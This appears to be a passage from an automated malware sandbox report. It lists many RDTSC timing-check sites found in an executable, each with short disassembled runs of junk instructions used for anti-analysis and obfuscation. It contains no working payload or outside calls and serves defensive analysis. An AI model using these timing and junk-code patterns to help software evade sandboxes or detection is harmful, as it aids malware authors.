                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CEA8B second address: 4CEA8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CEA8F second address: 4CEAA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D5269634h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CEAA9 second address: 4CEAE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB37h 0x00000007 jmp 00007F95D47CFB31h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007F95D47CFB26h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CEAE1 second address: 4CEAF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D526962Bh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5203F3 second address: 520415 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F95D47CFB36h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 520415 second address: 52042A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F95D5269626h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d jl 00007F95D5269628h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52042A second address: 520438 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F95D47CFB28h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 520438 second address: 52043C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 520581 second address: 520590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F95D47CFB26h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 520590 second address: 520599 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 520599 second address: 52059F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5206FB second address: 520701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 520701 second address: 520721 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F95D47CFB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F95D47CFB33h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52088F second address: 52089F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F95D5269626h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52089F second address: 5208A7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5209E2 second address: 5209F8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F95D5269626h 0x00000008 jno 00007F95D5269626h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5209F8 second address: 520A04 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F95D47CFB26h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 520B7B second address: 520B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 520CCC second address: 520CF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F95D47CFB26h 0x0000000a jmp 00007F95D47CFB35h 0x0000000f popad 0x00000010 pop edx 0x00000011 jo 00007F95D47CFB4Fh 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 520CF6 second address: 520D10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F95D5269626h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F95D526962Dh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52583C second address: 525844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52598B second address: 5259AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F95D5269639h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5259AF second address: 5259F5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F95D47CFB2Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F95D47CFB2Ch 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 jnp 00007F95D47CFB26h 0x0000001a jmp 00007F95D47CFB38h 0x0000001f pop edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5259F5 second address: 5259FD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5259FD second address: 525A02 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52639D second address: 5263A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AAC8F second address: 4AACC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jng 00007F95D47CFB26h 0x00000010 jmp 00007F95D47CFB30h 0x00000015 pop ecx 0x00000016 popad 0x00000017 push eax 0x00000018 jp 00007F95D47CFB32h 0x0000001e jnl 00007F95D47CFB26h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52EDE3 second address: 52EE25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D5269635h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F95D526962Dh 0x0000000e jmp 00007F95D5269638h 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52DED7 second address: 52DEF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 jmp 00007F95D47CFB35h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52DEF4 second address: 52DF0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007F95D5269632h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52DF0F second address: 52DF13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E078 second address: 52E07E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E07E second address: 52E082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E2F5 second address: 52E305 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D526962Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E59A second address: 52E5B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E5B7 second address: 52E5BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E5BD second address: 52E5C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E5C1 second address: 52E5EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F95D5269632h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jo 00007F95D526962Ch 0x00000014 je 00007F95D5269626h 0x0000001a push eax 0x0000001b push edx 0x0000001c push esi 0x0000001d pop esi 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E70F second address: 52E75C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jo 00007F95D47CFB26h 0x0000000f jmp 00007F95D47CFB39h 0x00000014 jmp 00007F95D47CFB38h 0x00000019 popad 0x0000001a jc 00007F95D47CFB2Ch 0x00000020 jne 00007F95D47CFB26h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E75C second address: 52E764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E764 second address: 52E768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E768 second address: 52E76E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E87B second address: 52E87F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5324DB second address: 5324E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5324E3 second address: 5324E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53208A second address: 53208E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53208E second address: 532094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5321F4 second address: 5321FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535512 second address: 53551D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53551D second address: 535523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535523 second address: 53552C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53552C second address: 53554A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F95D526962Eh 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534F32 second address: 534F3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534F3C second address: 534F45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534F45 second address: 534F54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534F54 second address: 534F68 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jo 00007F95D5269626h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F95D5269626h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 534F68 second address: 534F6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350BF second address: 5350C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F95D5269626h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350C9 second address: 5350EF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F95D47CFB26h 0x00000008 jmp 00007F95D47CFB38h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5350EF second address: 535107 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnc 00007F95D5269626h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push edi 0x00000010 jnc 00007F95D5269626h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53522E second address: 535238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F95D47CFB26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535238 second address: 535279 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D5269639h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c jp 00007F95D5269626h 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F95D5269636h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539409 second address: 53940D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538A8D second address: 538A92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538A92 second address: 538A9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538A9A second address: 538AB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F95D526962Ch 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007F95D5269626h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538AB6 second address: 538ABA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538BED second address: 538BF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538BF1 second address: 538BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538BF9 second address: 538C0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F95D526962Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538C0D second address: 538C3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnl 00007F95D47CFB28h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 jg 00007F95D47CFB26h 0x00000017 jmp 00007F95D47CFB31h 0x0000001c push eax 0x0000001d pop eax 0x0000001e popad 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538DAE second address: 538DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538DB7 second address: 538DDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c ja 00007F95D47CFB26h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53911F second address: 53913C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 je 00007F95D526962Eh 0x0000000d ja 00007F95D5269626h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jns 00007F95D5269626h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53913C second address: 539159 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jno 00007F95D47CFB26h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539159 second address: 53915D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C7B2 second address: 53C7EB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F95D47CFB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F95D47CFB37h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F95D47CFB33h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C7EB second address: 53C7FB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F95D5269626h 0x00000008 jnp 00007F95D5269626h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C7FB second address: 53C812 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F95D47CFB32h 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0B28 second address: 4A0B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0B2E second address: 4A0B3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0B3A second address: 4A0B40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5418BA second address: 5418BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5418BE second address: 5418C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541A2E second address: 541A38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541B7E second address: 541B82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541B82 second address: 541BA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F95D47CFB2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F95D47CFB2Ah 0x0000000e pop edi 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541BA3 second address: 541BA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54B419 second address: 54B435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F95D47CFB37h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549497 second address: 54949F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54949F second address: 5494EF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F95D47CFB28h 0x00000008 jmp 00007F95D47CFB2Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jg 00007F95D47CFB2Ch 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F95D47CFB36h 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F95D47CFB2Dh 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5494EF second address: 5494F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549766 second address: 549776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F95D47CFB2Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549776 second address: 549780 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F95D5269626h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549780 second address: 549784 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549784 second address: 54978E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
